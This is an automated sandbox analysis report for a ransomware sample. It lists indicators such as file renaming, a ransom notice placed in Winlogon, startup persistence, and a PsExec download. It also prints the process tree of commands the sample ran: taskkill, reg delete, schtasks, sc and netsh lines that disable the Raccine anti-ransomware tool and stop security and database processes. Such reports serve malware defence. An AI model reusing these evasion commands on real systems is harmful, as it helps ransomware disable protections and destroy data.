f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327

Resubmissions

18-01-2022 15:29

220118-sw4ecsbhen 10

29-10-2021 12:17

211029-pf6m1aaabk 10

Analysis

max time kernel
110s
max time network
122s
platform
windows10_x64
resource
win10-en-20211014
submitted
29-10-2021 12:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
Size

133KB
MD5

91b493febfc1d782875a09fc076a8850
SHA1

ed12cfbedc90181e869fce19dc820063fa6b3179
SHA256

f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327
SHA512

bb66d4d65f8f615e6af06f4815233a2a7430373e4afc5a61a2b2fff0dc9a6a002b4edad0db2a336b24dabd65efc3b74f57985836d137f25eb87a1901cfa4b9a9

Score

8^/10

evasion persistence ransomware

Malware Config

Signatures

Downloads MZ/PE file

Downloads PsExec from SysInternals website 1 IoCs

Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.

description	flow	ioc
HTTP URL	30	http://live.sysinternals.com/PsExec64.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies extensions of user files 5 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\CompleteLimit.tiff	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File renamed	C:\Users\Admin\Pictures\CompleteLimit.tiff => C:\Users\Admin\Pictures\CompleteLimit.tiff.REV	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened for modification	C:\Users\Admin\Pictures\CompleteLimit.tiff.REV	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File renamed	C:\Users\Admin\Pictures\EnterGrant.png => C:\Users\Admin\Pictures\EnterGrant.png.REV	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened for modification	C:\Users\Admin\Pictures\EnterGrant.png.REV	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reload1.lnk	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe

Drops desktop.ini file(s) 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\I:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\F:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\G:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\V:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\W:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\Y:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\H:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\B:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\M:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\E:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\T:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\P:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\A:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\S:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\K:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\X:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\R:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\O:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\J:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\L:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\Z:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\N:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\Q:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\U:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..."	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your files were encrypted, if you want to get them all back, please carefully read the text note located in your desktop..."	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe

Drops file in Windows directory 13 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\3623239459\11870838.pri	netsh.exe
File created	C:\Windows\rescache\_merged\81479705\2284120958.pri	netsh.exe
File created	C:\Windows\rescache\_merged\3418783148\4223189797.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4185669309\1880392806.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1974107395\1506172464.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1301087654\4010849688.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1476457207\263943467.pri	netsh.exe
File created	C:\Windows\rescache\_merged\2878165772\3312292840.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4183903823\1195458082.pri	netsh.exe
File created	C:\Windows\rescache\_merged\423379043\2764571712.pri	netsh.exe
File created	C:\Windows\rescache\_merged\2483382631\1144272743.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4272278488\927794230.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1601268389\3068621934.pri	netsh.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 48 IoCs

evasion

pid	Process
3544	taskkill.exe
700	taskkill.exe
380	taskkill.exe
1528	taskkill.exe
700	taskkill.exe
3572	taskkill.exe
1392	taskkill.exe
2864	taskkill.exe
4072	taskkill.exe
2652	taskkill.exe
1872	taskkill.exe
2460	taskkill.exe
3940	taskkill.exe
296	taskkill.exe
1656	taskkill.exe
840	taskkill.exe
1720	taskkill.exe
4004	taskkill.exe
2412	taskkill.exe
2776	taskkill.exe
3208	taskkill.exe
3192	taskkill.exe
2704	taskkill.exe
428	taskkill.exe
3860	taskkill.exe
2092	taskkill.exe
2060	taskkill.exe
1216	taskkill.exe
1416	taskkill.exe
1780	taskkill.exe
1148	taskkill.exe
1356	taskkill.exe
508	taskkill.exe
1944	taskkill.exe
3692	taskkill.exe
1956	taskkill.exe
800	taskkill.exe
2820	taskkill.exe
4060	taskkill.exe
2120	taskkill.exe
1756	taskkill.exe
836	taskkill.exe
3764	taskkill.exe
2648	taskkill.exe
3708	taskkill.exe
1172	taskkill.exe
2524	taskkill.exe
1040	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
3604	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1456	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

description	pid	Process
Token: SeDebugPrivilege	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
Token: SeDebugPrivilege	428	taskkill.exe
Token: SeDebugPrivilege	1148	taskkill.exe
Token: SeDebugPrivilege	1356	taskkill.exe
Token: SeDebugPrivilege	4060	taskkill.exe
Token: SeDebugPrivilege	2120	taskkill.exe
Token: SeDebugPrivilege	508	taskkill.exe
Token: SeDebugPrivilege	3572	taskkill.exe
Token: SeDebugPrivilege	1392	taskkill.exe
Token: SeDebugPrivilege	700	taskkill.exe
Token: SeDebugPrivilege	2412	taskkill.exe
Token: SeDebugPrivilege	1872	taskkill.exe
Token: SeDebugPrivilege	2776	taskkill.exe
Token: SeDebugPrivilege	380	taskkill.exe
Token: SeDebugPrivilege	3860	taskkill.exe
Token: SeDebugPrivilege	2092	taskkill.exe
Token: SeDebugPrivilege	2460	taskkill.exe
Token: SeDebugPrivilege	2060	taskkill.exe
Token: SeDebugPrivilege	1172	taskkill.exe
Token: SeDebugPrivilege	1216	taskkill.exe
Token: SeDebugPrivilege	2524	taskkill.exe
Token: SeDebugPrivilege	1416	taskkill.exe
Token: SeDebugPrivilege	1756	taskkill.exe
Token: SeDebugPrivilege	3940	taskkill.exe
Token: SeDebugPrivilege	4072	taskkill.exe
Token: SeDebugPrivilege	1944	taskkill.exe
Token: SeDebugPrivilege	2864	taskkill.exe
Token: SeDebugPrivilege	3692	taskkill.exe
Token: SeDebugPrivilege	2652	taskkill.exe
Token: SeDebugPrivilege	1040	taskkill.exe
Token: SeDebugPrivilege	296	taskkill.exe
Token: SeDebugPrivilege	1956	taskkill.exe
Token: SeDebugPrivilege	800	taskkill.exe
Token: SeDebugPrivilege	1656	taskkill.exe
Token: SeDebugPrivilege	2820	taskkill.exe
Token: SeDebugPrivilege	840	taskkill.exe
Token: SeDebugPrivilege	836	taskkill.exe
Token: SeDebugPrivilege	1528	taskkill.exe
Token: SeDebugPrivilege	1720	taskkill.exe
Token: SeDebugPrivilege	3544	taskkill.exe
Token: SeDebugPrivilege	3764	taskkill.exe
Token: SeDebugPrivilege	4004	taskkill.exe
Token: SeDebugPrivilege	1780	taskkill.exe
Token: SeDebugPrivilege	3192	taskkill.exe
Token: SeDebugPrivilege	2648	taskkill.exe
Token: SeDebugPrivilege	2704	taskkill.exe
Token: SeDebugPrivilege	3708	taskkill.exe
Token: SeDebugPrivilege	700	taskkill.exe
Token: SeDebugPrivilege	2412	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3140 wrote to memory of 428	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	69
PID 3140 wrote to memory of 428	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	69
PID 3140 wrote to memory of 420	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	71
PID 3140 wrote to memory of 420	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	71
PID 3140 wrote to memory of 3604	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	73
PID 3140 wrote to memory of 3604	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	73
PID 3140 wrote to memory of 3872	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	75
PID 3140 wrote to memory of 3872	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	75
PID 3140 wrote to memory of 2132	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	77
PID 3140 wrote to memory of 2132	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	77
PID 3140 wrote to memory of 1112	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	81
PID 3140 wrote to memory of 1112	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	81
PID 3140 wrote to memory of 2088	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	79
PID 3140 wrote to memory of 2088	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	79
PID 3140 wrote to memory of 1072	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	83
PID 3140 wrote to memory of 1072	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	83
PID 3140 wrote to memory of 608	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	84
PID 3140 wrote to memory of 608	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	84
PID 3140 wrote to memory of 64	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	87
PID 3140 wrote to memory of 64	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	87
PID 3140 wrote to memory of 2988	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	89
PID 3140 wrote to memory of 2988	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	89
PID 3140 wrote to memory of 840	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	91
PID 3140 wrote to memory of 840	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	91
PID 3140 wrote to memory of 3644	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	93
PID 3140 wrote to memory of 3644	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	93
PID 3140 wrote to memory of 1148	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	95
PID 3140 wrote to memory of 1148	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	95
PID 3140 wrote to memory of 1356	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	100
PID 3140 wrote to memory of 1356	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	100
PID 3140 wrote to memory of 4060	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	99
PID 3140 wrote to memory of 4060	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	99
PID 3140 wrote to memory of 2120	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	101
PID 3140 wrote to memory of 2120	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	101
PID 3140 wrote to memory of 508	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	102
PID 3140 wrote to memory of 508	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	102
PID 3140 wrote to memory of 3572	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	105
PID 3140 wrote to memory of 3572	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	105
PID 3140 wrote to memory of 1392	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	107
PID 3140 wrote to memory of 1392	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	107
PID 3140 wrote to memory of 700	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	108
PID 3140 wrote to memory of 700	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	108
PID 3140 wrote to memory of 2412	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	112
PID 3140 wrote to memory of 2412	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	112
PID 3140 wrote to memory of 1872	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	113
PID 3140 wrote to memory of 1872	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	113
PID 3140 wrote to memory of 2776	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	115
PID 3140 wrote to memory of 2776	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	115
PID 3140 wrote to memory of 380	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	117
PID 3140 wrote to memory of 380	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	117
PID 3140 wrote to memory of 3860	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	120
PID 3140 wrote to memory of 3860	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	120
PID 3140 wrote to memory of 2092	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	121
PID 3140 wrote to memory of 2092	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	121
PID 3140 wrote to memory of 2460	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	123
PID 3140 wrote to memory of 2460	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	123
PID 3140 wrote to memory of 2060	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	125
PID 3140 wrote to memory of 2060	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	125
PID 3140 wrote to memory of 1172	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	126
PID 3140 wrote to memory of 1172	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	126
PID 3140 wrote to memory of 1216	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	129
PID 3140 wrote to memory of 1216	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	129
PID 3140 wrote to memory of 2524	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	131
PID 3140 wrote to memory of 2524	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	131

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Information..."	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your files were encrypted, if you want to get them all back, please carefully read the text note located in your desktop..."	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe

C:\Users\Admin\AppData\Local\Temp\f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
"C:\Users\Admin\AppData\Local\Temp\f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Drops desktop.ini file(s)
- Enumerates connected drives
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3140
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:428
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:420
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:3604
- C:\Windows\SYSTEM32\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:3872
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:2132
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:2088
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:1112
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  - Drops file in Windows directory
  PID:1072
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:608
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:64
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:2988
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:840
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:3644
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1148
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4060
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1356
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2120
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:508
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3572
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1392
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:700
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2412
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1872
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
